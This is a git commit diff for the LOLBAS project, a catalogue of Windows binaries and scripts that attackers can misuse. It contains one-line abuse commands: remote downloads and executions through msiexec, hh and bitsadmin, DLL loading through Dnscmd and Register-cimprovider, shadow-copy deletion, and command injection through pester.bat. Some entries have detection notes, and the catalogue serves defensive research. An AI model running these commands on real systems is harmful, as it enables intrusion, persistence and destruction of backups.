Merge branch 'master' into master

master
giMini 2018-05-11 21:25:17 -04:00 committed by GitHub
commit 061b7eae6e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
30 changed files with 478 additions and 83 deletions

View File

@ -3,9 +3,8 @@ Kd.exe Debugger
Certreq.exe Exfiltrate data
Dbghost.exe
Robocopy.exe Needs examples
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
notepad.exe Gui - Download files using Open (A lot of other programs as well)
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe wbadmin delete catalog -quiet
psexec.exe Remote execution of code
java.exe -agentpath:<dllname_with_dll_extension> or -agentlib:<dllname>
@ -14,5 +13,6 @@ odbcad32.exe GUI DLL Loading
WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution

View File

@ -1,11 +1,13 @@
# LOLBins - Living Off The Land Binaries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBin.png" height="150">
# OS BINARIES
[Atbroker.exe](OSBinaries/Atbroker.md)
[Appvlp.exe](OSBinaries/Appvlp.md)
[Bash.exe](OSBinaries/Bash.md)
[Bitsadmin.exe](OSBinaries/Bitsadmin.md)
[Certutil.exe](OSBinaries/Certutil.md)
[Cmdkey.exe](OSBinaries/Cmdkey.md)
[Cmstp.exe](OSBinaries/Cmstp.md)
@ -14,6 +16,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Cscript.exe](OSBinaries/Cscript.md)
[Dfsvc.exe](OSBinaries/Dfsvc.md)
[Diskshadow.exe](OSBinaries/Diskshadow.md)
[Dnscmd.exe](OSBinaries/Dnscmd.md)
[Esentutl.exe](OSBinaries/Esentutl.md)
[Extexport.exe](OSBinaries/Extexport.md)
[Extrac32.exe](OSBinaries/Extrac32.md)
@ -44,11 +47,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md)
[Qprocess.exe](OSBinaries/Qprocess.md)
[Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md)
[Regasm.exe](OSBinaries/Regasm.md)
[Regini.exe](OSBinaries/Regini.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md)
[Replace.exe](OSBinaries/Replace.md)
@ -60,6 +62,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Sc.exe](OSBinaries/Sc.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
[Wab.exe](OSBinaries/Wab.md)
[Wmic.exe](OSBinaries/Wmic.md)
[Wscript.exe](OSBinaries/Wscript.md)
[Xwizard.exe](OSBinaries/Xwizard.md)
@ -72,18 +75,20 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Cdb.exe](OtherMSBinaries/Cdb.md)
[Csi.exe](OtherMSBinaries/Csi.md)
[Dnx.exe](OtherMSBinaries/Dnx.md)
[Dxcap.exe](OtherMSBinaries/Dxcap.md)
[Mftrace.exe](OtherMSBinaries/Mftrace.md)
[Msxsl.exe](OtherMSBinaries/Msxsl.md)
[Rcsi.exe](OtherMSBinaries/Rcsi.md)
[Sqldumper.exe](OtherMSBinaries/Sqldumper.md)
[Sqlps.exe](OtherMSBinaries/Sqlps.md)
[SQLToolsPS.exe](OtherMSBinaries/SQLToolsPS.md)
[Sqltoolsps.exe](OtherMSBinaries/Sqltoolsps.md)
[Te.exe](OtherMSBinaries/Te.md)
[Tracker.exe](OtherMSBinaries/Tracker.md)
[Vsjitdebugger.exe](OtherMSBinaries/Vsjitdebugger.md)
[Winword.exe](OtherMSBinaries/Winword.md)
# OTHER NON MICROSOFT BINARIES
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md)

View File

@ -1,7 +1,7 @@
# LOLLibs - Living Off The Land Libraries
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLLib.png" height="150">
# OS LIBRARIES
[Advpack.dll](OSLibraries/Advpack.md)

View File

@ -1,14 +1,23 @@
# LOLScripts - Living Off The Land Scripts
Please contribute and do point out errors or resources I have forgotten.
If you are missing from the acknowledgement, please let me know (I did not forget anyone on purpose).
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLScript.png" height="150">
# OS SCRIPTS
[Cl_invocation.ps1](OSScrits/Cl_invocation.md)
[CL_mutexverifiers.ps1](OSScripts/CL_mutexverifiers.md)
[Manage-bde.vbs](OSScripts/Manage-bde.md)
[pester.bat](OSScripts/pester.md)
[Pubprn.vbs](OSScripts/Pubprn.md)
[Slmgr.vbs](OSScripts/Slmgr.md)
[Syncappvpublishingserver.vbs](OSScripts/Syncappvpublishingserver.md)
[Winrm.vbs](OSScripts/Winrm.md)
# OTHER MICROSOFT SIGNED SCRIPTS
# OTHER NON MICROSOFT BINARIES
[Testxlst.js](OtherScripts/Testxlst.md)

BIN
Logo/LOL1.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 269 KiB

BIN
Logo/LOL2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 65 KiB

BIN
Logo/LOL3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 53 KiB

BIN
Logo/LOLBAS.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 247 KiB

BIN
Logo/LOLBAS2.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 55 KiB

BIN
Logo/LOLBAS3.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 45 KiB

BIN
Logo/LOLBin.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

BIN
Logo/LOLLib.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 47 KiB

BIN
Logo/LOLScript.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 29 KiB

35
OSBinaries/Appvlp.md Normal file
View File

@ -0,0 +1,35 @@
## Appvlp.exe
* Functions: Execute
```
AppVLP.exe \\webdav\calc.bat
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
```
Acknowledgements:
* Will - @moo_hax
Code sample:
*
Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264
Full path:
```
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
```
Notes:
Used by App-V
Detection:
Appvlp.exe spawning other process

47
OSBinaries/Bitsadmin.md Normal file
View File

@ -0,0 +1,47 @@
## Bitsadmin.exe
* Functions: Execute, Download, Copy, Read ADS
```
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
```
Acknowledgements:
* Rob Fuller - @mubix
* Chris Gates - @carnal0wnage
* Oddvar Moe - @oddvarmoe
Code sample:
*
Resources:
* https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53
* https://www.youtube.com/watch?v=_8xJaaQlpBo
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Full path:
```
c:\windows\system32\bitsadmin.exe
c:\windows\sysWOW64\bitsadmin.exe
```
Notes:
Detection:

37
OSBinaries/Dnscmd.md Normal file
View File

@ -0,0 +1,37 @@
## Dnscmd.exe
* Functions: Execute
```
dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
```
Acknowledgements:
* Shay Ber - ?
* Dimitrios Slamaris - @dim0x69
* Nikhil SamratAshok Mittal - @nikhil_mitt
Code sample:
*
Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
Full path:
```
c:\windows\system32\Dnscmd.exe
c:\windows\sysWOW64\Dnscmd.exe
```
Notes:
Used on Windows servers for DNS management
Detection:

View File

@ -1,15 +1,18 @@
## Extrac32.exe
* Functions: Add ADS
* Functions: Add ADS, Download
```
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
```
Acknowledgements:
* Oddvar Moe - @oddvarmoe
* egre55 - @egre55
Code sample:
*
@ -17,6 +20,7 @@ Code sample:
Resources:
* https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* https://twitter.com/egre55/status/985994639202283520
Full path:
```

View File

@ -1,11 +1,15 @@
## hh.exe
* Functions: Open Explorer
* Functions: Download, Execute
```
HH.exe http://www.google.com
HH.exe C:\
HH.exe c:\windows\system32\calc.exe
HH.exe http://some.url/script.ps1
```
Acknowledgements:

View File

@ -4,17 +4,24 @@
```
msiexec /quiet /i cmd.msi
msiexec /q /i http://192.168.100.3/tmp/cmd.png
msiexec /y "C:\folder\evil.dll"
msiexec /z "C:\folder\evil.dll"
```
Acknowledgements:
* ? - @netbiosX
* PhilipTsukerman - @PhilipTsukerman
Code sample:
*
Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
* https://twitter.com/PhilipTsukerman/status/992021361106268161
Full path:
```

View File

@ -1,31 +0,0 @@
## Qprocess.exe
* Functions: Credentials
```
qprocess /SERVER:RemoteServer
```
Acknowledgements:
* Rahmat Nurfauzi - @infosecn1nja
Code sample:
*
Resources:
* https://twitter.com/infosecn1nja/status/987268926139592706
Full path:
```
c:\windows\system32\Qprocess.exe
```
Notes:
Some specific details about the binary file.
Detection:
Details about detection.
IOC, Behaviour , User Agents etc

View File

@ -1,30 +0,0 @@
## Regini.exe
* Functions: Credentials
```
regini -m \\RemoteServer Example
```
Acknowledgements:
* Osanda Malith - @OsandaMalith
Code sample:
*
Resources:
* https://twitter.com/OsandaMalith/status/987823644402372608
* https://ss64.com/nt/regini.html
Full path:
```
c:\windows\system32\regini.exe
c:\windows\sysWOW64\regini.exe
```
Notes:
Can also be used to add registry keys
Detection:

View File

@ -0,0 +1,30 @@
## Register-cimprovider.exe
* Functions: Execute
```
Register-cimprovider -path "C:\folder\evil.dll"
```
Acknowledgements:
* PhilipTsukerman - @PhilipTsukerman
Code sample:
*
Resources:
* https://twitter.com/PhilipTsukerman/status/992021361106268161
Full path:
```
c:\windows\system32\Register-cimprovider.exe
c:\windows\sysWOW64\Register-cimprovider.exe
```
Notes:
Detection:

View File

@ -4,6 +4,8 @@
```
Scriptrunner.exe -appvscript calc.exe
ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
```
Acknowledgements:
@ -15,6 +17,7 @@ Code sample:
Resources:
* https://twitter.com/KyleHanslovan/status/914800377580503040
* https://twitter.com/NickTyrer/status/914234924655312896
* https://github.com/MoooKitty/Code-Execution
Full path:
```

38
OSBinaries/Wab.md Normal file
View File

@ -0,0 +1,38 @@
## Wab.exe
* Functions: Execute
```
Wab.exe (requires registry changes)
```
Acknowledgements:
* Adam - @Hexacorn
Code sample:
*
Resources:
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
* https://twitter.com/Hexacorn/status/991447379864932352
Full path:
```
C:\Program Files\Windows Mail\wab.exe
C:\Program Files (x86)\Windows Mail\wab.exe
```
Notes:
Searches for wab.dll. Can be manipulated with the following registry key:
```
HKLM\Software\Microsoft\WAB\DLLPath
```
Binary is used to manage Windows contacts/wab files. (Legacy)
Detection:
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath

107
OSScripts/pester.md Normal file
View File

@ -0,0 +1,107 @@
## pester.bat
* Functions: Execute
```
# Execute notepad
Pester.bat /help "$null; notepad"
# Execute calc
Pester.bat /help "$null; calc"
# Execute Get-Process cmdlet
Pester.bat /help "$null; ps"
# Other options for 2nd parameter
pester.bat help "$null; notepad"
pester.bat /help "$null; notepad"
pester.bat ? "$null; notepad"
pester.bat -? "$null; notepad"
pester.bat /? "$null; notepad"
# 3rd parameter can be anything
pester.bat /help "'doesnotexist'; notepad"
pester.bat /help "Get-Help; notepad"
pester.bat /help "gcm;notepad"
# 4th parameter is the payload
```
Acknowledgements:
* Emin Atac - @p0w3rsh3ll
Code sample:
None
Resources:
None
Full path:
```powershell
# Shipped inbox
"c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
# There can be other versions present as well
Dir "c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat"
```
Notes: This file is digitally signed by a Microsoft certificate
```powershell
Get-FileHash "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat"
Algorithm Hash Path
--------- ---- ----
SHA256 EB83A9D837CFE2F409CA3839B017E307A7A65782CB6A0AE0C50731C244DAD40E C:\Program Files\WindowsPower...
Get-AuthenticodeSignature "C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" | fl
SignerCertificate : [Subject]
CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
[Issuer]
CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington,
C=US
[Serial Number]
33000001733031072665B8B9B3000000000173
[Not Before]
11/08/2017 22:23:35
[Not After]
11/08/2018 22:23:35
[Thumbprint]
14590DC5C3AAF238FCFD7785B4B93F4071402C34
TimeStamperCertificate : [Subject]
CN=Microsoft Time-Stamp Service, OU=nCipher DSE ESN:12E7-3064-6112, OU=AOC, O=Microsoft
Corporation, L=Redmond, S=Washington, C=US
[Issuer]
CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
[Serial Number]
33000000AC8A21BC7AD29B72F40000000000AC
[Not Before]
07/09/2016 19:56:54
[Not After]
07/09/2018 19:56:54
[Thumbprint]
3970258B14C879DD5F0C5DE98B9CB39499F71CB7
Status : Valid
StatusMessage : Signature verified.
Path : C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
SignatureType : Catalog
IsOSBinary : True
```

31
OtherMSBinaries/Dxcap.md Normal file
View File

@ -0,0 +1,31 @@
## Dxcap.exe
* Functions: Execute
```
Dxcap.exe -c C:\Windows\System32\notepad.exe
```
Acknowledgements:
* Matt harr0ey - @harr0ey
Code sample:
*
Resources:
* https://twitter.com/harr0ey/status/992008180904419328
Full path:
```
?
```
Notes:
This file is a part of Visual studio.
https://msdn.microsoft.com/en-us/library/dn774939.aspx
Detection:

View File

@ -22,10 +22,12 @@ Resources:
Full path:
```
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
```
Notes:
Part of SQL server, but also Office in some versions.

32
OtherScripts/Testxlst.md Normal file
View File

@ -0,0 +1,32 @@
## testxlst.js
* Functions: Execute
```
cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
*
Resources:
* https://twitter.com/bohops/status/993314069116485632
Full path:
```
c:\python27amd64\Lib\site-packages\win32com\test
```
Notes:
Part of Pywin32
https://github.com/mhammond/pywin32
Detection:

View File

@ -1,16 +1,81 @@
# Living Off The Land Binaries and Scripts
# Living Off The Land Binaries and Scripts (and now also Libraries)
There are three different lists.
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOLBAS.png" height="250">
There are currently three different lists.
* [LOLBins](LOLBins.md)
* [LOLLibs](LOLLibs.md)
* [LOLScripts](LOLScripts.md)
The goal of these lists are to document every binary and script that can be used for other purposes than they are designed to.
Every binary and script has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
The goal of these lists are to document every binary, script and library that can be used for Living Off The Land techniques.
Definition of LOLBAS candidates (Binaries,scripts and libraries):
* LOLBAS candidates must be present on the system by default or introduced by application/software "installation" from a "reputable" vendor or open-source entity. Otherwise, LOLBAS determination is subject to scrutiny by the (security) community and agreed upon standards.
* Can be used as an attacker tool directly or can perform other actions than what it was intended to do (Ex: regsvr32 - execute code from SCT online)
* executing code
* downloading/upload files
* bypass UAC
* compile code
* getting creds/dumping process
* surveillance (keylogger, network trace)
* evade logging/remove log entry
* side-loading/hijacking of DLL
* pass-through execution of other programs, script (via a LOLBin)
* pass-through persistence utilizing existing LOLBin
* persistence (Hide data in ADS, execute at logon etc)
Right now it is me that decides if the files are a valid contribution or not.
I try my best to conclude with help from others in the InfoSec community and I do not wish to exclude anything.
Also, please be patient if it takes some time for your contribution to be added to the list. I am just one guy.
Every binary, script and library has it's own .md file in the subfolders. That way I should be easier to maintain and reuse.
I have borrowed examples from the community (And a lot from Red Canary - Atomic Red Team - Thanks @subtee)
Would really love if the community could contribute as much as possible. That would make it better for everyone.
If you think it is hard to make a pull request using github, don't hasitate to send me a tweet and I will add the contribution for you.
## STORY
"Living off the land" was coined by Matt Graeber - @mattifestation <3
One of the first "Living Off The Land" talks (That I know of) is this one:
https://www.youtube.com/watch?v=j-r6UonEkUw
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
https://twitter.com/MathCasualty/status/969174982579273728
The term LOLScripts came from Jimmy - @bohops:
https://twitter.com/bohops/status/984828803120881665
Common hashtags for these files are:
#LOLBin
#LOLBins
#LOLScript
#LOLScripts
#LOLLib
#LOLLibs
A "highly scientific poll" was also conducted to agree (69% yes) on the name LOLBins.
https://twitter.com/Oddvarmoe/status/985432848961343488
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
Love this logo:
<img src="https://github.com/api0cradle/LOLBAS/raw/master/Logo/LOL1.png" height="250">
## Future work / Todo list
- [ ] Better classification system
- [ ] Load DLL
- [ ] Arbitrary unsigned code execution
- [ ] Launch other process
- [ ] Better contribution template
- [ ] Provide the project in DB format (sqlite)
- [ ] Re-factor project (version 2.0) and move it to a dedicated project site (https://github.com/LOLBAS-Project)
- [ ] Map it to the Mitre Att&ck <3
- [ ] LOLGuiBins
- [ ] More list based on classifications
- [ ] LOLBAS lists for Linux? OSX?